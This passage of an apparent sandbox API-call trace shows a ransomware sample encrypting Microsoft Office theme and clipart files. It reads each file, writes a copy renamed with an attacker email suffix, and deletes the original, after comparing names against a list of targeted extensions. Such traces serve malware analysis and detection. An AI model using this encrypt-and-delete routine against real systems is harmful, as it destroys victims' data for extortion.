(lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0249.658] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid")) returned 1 [0249.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0249.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0249.664] lstrlenW (lpString=".doc") returned 4 [0249.664] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0249.664] lstrlenW (lpString=".docx") returned 5 [0249.664] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0249.664] lstrlenW (lpString=".pdf") returned 4 [0249.664] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0249.664] lstrlenW (lpString=".xls") returned 4 [0249.664] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0249.664] lstrlenW (lpString=".xlsx") returned 5 [0249.664] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0249.664] lstrlenW (lpString=".ppt") returned 4 [0249.664] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0249.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0249.664] lstrlenW (lpString=".zip") returned 4 [0249.664] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0249.664] lstrlenW (lpString=".rar") returned 4 [0249.664] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0249.664] lstrlenW (lpString=".bz2") returned 4 [0249.664] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0249.664] lstrlenW (lpString=".7z") returned 3 [0249.664] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0249.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0249.665] lstrlenW (lpString=".dbf") returned 4 [0249.665] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0249.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0249.665] lstrlenW (lpString=".1cd") returned 4 [0249.665] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0249.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0249.665] lstrlenW (lpString=".jpg") returned 4 [0249.665] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0249.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0249.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0249.665] lstrlenW (lpString=".doc") returned 4 [0249.665] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0249.665] lstrlenW (lpString=".docx") returned 5 [0249.665] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0249.665] lstrlenW (lpString=".pdf") returned 4 [0249.665] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0249.665] lstrlenW (lpString=".xls") returned 4 [0249.665] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0249.665] lstrlenW (lpString=".xlsx") returned 5 [0249.665] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0249.665] lstrlenW (lpString=".ppt") returned 4 [0249.665] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0249.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0249.665] lstrlenW (lpString=".zip") returned 4 [0249.665] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0249.665] lstrlenW (lpString=".rar") returned 4 [0249.665] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0249.665] lstrlenW (lpString=".bz2") returned 4 [0249.665] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0249.665] lstrlenW (lpString=".7z") returned 3 [0249.666] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0249.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0249.666] lstrlenW (lpString=".dbf") returned 4 [0249.666] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0249.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0249.666] lstrlenW (lpString=".1cd") returned 4 [0249.666] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0249.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0249.666] lstrlenW (lpString=".jpg") returned 4 [0249.666] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0249.666] lstrcmpiW (lpString1=".eftx", lpString2=".php") returned -1 [0249.666] lstrlenW (lpString="Clarity.eftx") returned 12 [0249.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0249.676] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=32818) returned 1 [0249.676] CloseHandle (hObject=0x3a8) returned 1 [0249.677] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx")) returned 0x20 [0249.707] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0249.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0249.708] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.708] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0249.708] GetLastError () returned 0x0 [0249.708] ReadFile (in: hFile=0x390, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x8032, lpOverlapped=0x0) returned 1 [0249.751] WriteFile (in: hFile=0x3a8, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x8040, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x8040, lpOverlapped=0x0) returned 1 [0249.753] ReadFile (in: hFile=0x390, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0249.753] WriteFile (in: hFile=0x3a8, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0249.753] SetEndOfFile (hFile=0x3a8) returned 1 [0249.753] CloseHandle (hObject=0x3a8) returned 1 [0249.753] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.753] SetEndOfFile (hFile=0x390) returned 1 [0249.771] CloseHandle (hObject=0x390) returned 1 [0249.771] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0249.792] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx")) returned 1 [0249.796] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0249.796] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0249.796] lstrlenW (lpString=".doc") returned 4 [0249.796] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0249.796] lstrlenW (lpString=".docx") returned 5 [0249.796] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0249.796] lstrlenW (lpString=".pdf") returned 4 [0249.796] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0249.796] lstrlenW (lpString=".xls") returned 4 [0249.796] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0249.796] lstrlenW (lpString=".xlsx") returned 5 [0249.796] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0249.796] lstrlenW (lpString=".ppt") returned 4 [0249.796] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0249.796] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0249.796] lstrlenW (lpString=".zip") returned 4 [0249.796] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0249.796] lstrlenW (lpString=".rar") returned 4 [0249.796] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0249.797] lstrlenW (lpString=".bz2") returned 4 [0249.797] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0249.797] lstrlenW (lpString=".7z") returned 3 [0249.797] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0249.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0249.797] lstrlenW (lpString=".dbf") returned 4 [0249.797] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0249.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0249.797] lstrlenW (lpString=".1cd") returned 4 [0249.797] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0249.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0249.797] lstrlenW (lpString=".jpg") returned 4 [0249.797] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0249.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0249.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0249.797] lstrlenW (lpString=".doc") returned 4 [0249.797] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0249.797] lstrlenW (lpString=".docx") returned 5 [0249.797] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0249.797] lstrlenW (lpString=".pdf") returned 4 [0249.797] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0249.797] lstrlenW (lpString=".xls") returned 4 [0249.797] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0249.797] lstrlenW (lpString=".xlsx") returned 5 [0249.797] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0249.797] lstrlenW (lpString=".ppt") returned 4 [0249.797] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0249.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0249.797] lstrlenW (lpString=".zip") returned 4 [0249.797] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0249.798] lstrlenW (lpString=".rar") returned 4 [0249.798] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0249.798] lstrlenW (lpString=".bz2") returned 4 [0249.798] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0249.798] lstrlenW (lpString=".7z") returned 3 [0249.798] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0249.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0249.798] lstrlenW (lpString=".dbf") returned 4 [0249.798] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0249.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0249.798] lstrlenW (lpString=".1cd") returned 4 [0249.798] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0249.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0249.798] lstrlenW (lpString=".jpg") returned 4 [0249.798] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0249.798] lstrcmpiW (lpString1=".eftx", lpString2=".php") returned -1 [0249.798] lstrlenW (lpString="Concourse.eftx") returned 14 [0249.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0249.800] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=22417) returned 1 [0249.800] CloseHandle (hObject=0x3ac) returned 1 [0249.800] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx")) returned 0x20 [0249.800] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0249.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0249.801] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.801] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0249.801] GetLastError () returned 0x0 [0249.801] ReadFile (in: hFile=0x3ac, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x5791, lpOverlapped=0x0) returned 1 [0249.804] WriteFile (in: hFile=0x390, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x57a0, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x57a0, lpOverlapped=0x0) returned 1 [0249.805] ReadFile (in: hFile=0x3ac, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0249.805] WriteFile (in: hFile=0x390, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0249.805] SetEndOfFile (hFile=0x390) returned 1 [0249.805] CloseHandle (hObject=0x390) returned 1 [0249.805] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.805] SetEndOfFile (hFile=0x3ac) returned 1 [0249.807] CloseHandle (hObject=0x3ac) returned 1 [0249.807] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0249.808] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx")) returned 1 [0249.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0249.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0249.808] lstrlenW (lpString=".doc") returned 4 [0249.808] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0249.808] lstrlenW (lpString=".docx") returned 5 [0249.808] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0249.808] lstrlenW (lpString=".pdf") returned 4 [0249.808] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0249.808] lstrlenW (lpString=".xls") returned 4 [0249.808] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0249.808] lstrlenW (lpString=".xlsx") returned 5 [0249.808] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0249.808] lstrlenW (lpString=".ppt") returned 4 [0249.808] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0249.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0249.808] lstrlenW (lpString=".zip") returned 4 [0249.808] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0249.808] lstrlenW (lpString=".rar") returned 4 [0249.808] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0249.808] lstrlenW (lpString=".bz2") returned 4 [0249.809] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0249.809] lstrlenW (lpString=".7z") returned 3 [0249.809] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0249.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0249.809] lstrlenW (lpString=".dbf") returned 4 [0249.809] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0249.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0249.809] lstrlenW (lpString=".1cd") returned 4 [0249.809] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0249.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0249.809] lstrlenW (lpString=".jpg") returned 4 [0249.809] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0249.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0249.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0249.809] lstrlenW (lpString=".doc") returned 4 [0249.809] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0249.809] lstrlenW (lpString=".docx") returned 5 [0249.809] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0249.809] lstrlenW (lpString=".pdf") returned 4 [0249.809] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0249.809] lstrlenW (lpString=".xls") returned 4 [0249.809] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0249.809] lstrlenW (lpString=".xlsx") returned 5 [0249.809] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0249.809] lstrlenW (lpString=".ppt") returned 4 [0249.809] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0249.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0249.809] lstrlenW (lpString=".zip") returned 4 [0249.809] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0249.809] lstrlenW (lpString=".rar") returned 4 [0249.810] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0249.810] lstrlenW (lpString=".bz2") returned 4 [0249.810] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0249.810] lstrlenW (lpString=".7z") returned 3 [0249.810] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0249.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0249.810] lstrlenW (lpString=".dbf") returned 4 [0249.810] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0249.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0249.810] lstrlenW (lpString=".1cd") returned 4 [0249.810] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0249.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0249.810] lstrlenW (lpString=".jpg") returned 4 [0249.810] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0249.810] lstrcmpiW (lpString1=".eftx", lpString2=".php") returned -1 [0249.811] lstrlenW (lpString="Couture.eftx") returned 12 [0249.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0249.811] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=1967905) returned 1 [0249.811] CloseHandle (hObject=0x3ac) returned 1 [0249.812] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx")) returned 0x20 [0249.812] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0249.812] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0249.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0249.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0249.812] lstrlenW (lpString=".doc") returned 4 [0249.812] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0249.812] lstrlenW (lpString=".docx") returned 5 [0249.812] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0249.812] lstrlenW (lpString=".pdf") returned 4 [0249.812] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0249.812] lstrlenW (lpString=".xls") returned 4 [0249.812] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0249.812] lstrlenW (lpString=".xlsx") returned 5 [0249.812] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0249.812] lstrlenW (lpString=".ppt") returned 4 [0249.812] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0249.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0249.812] lstrlenW (lpString=".zip") returned 4 [0249.812] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0249.812] lstrlenW (lpString=".rar") returned 4 [0249.812] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0249.812] lstrlenW (lpString=".bz2") returned 4 [0249.812] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0249.812] lstrlenW (lpString=".7z") returned 3 [0249.812] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0249.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0249.813] lstrlenW (lpString=".dbf") returned 4 [0249.813] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0249.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0249.813] lstrlenW (lpString=".1cd") returned 4 [0249.813] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0249.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0249.813] lstrlenW (lpString=".jpg") returned 4 [0249.813] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0249.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0249.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0249.813] lstrlenW (lpString=".doc") returned 4 [0249.813] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0249.813] lstrlenW (lpString=".docx") returned 5 [0249.813] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0249.813] lstrlenW (lpString=".pdf") returned 4 [0249.813] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0249.813] lstrlenW (lpString=".xls") returned 4 [0249.813] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0249.813] lstrlenW (lpString=".xlsx") returned 5 [0249.813] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 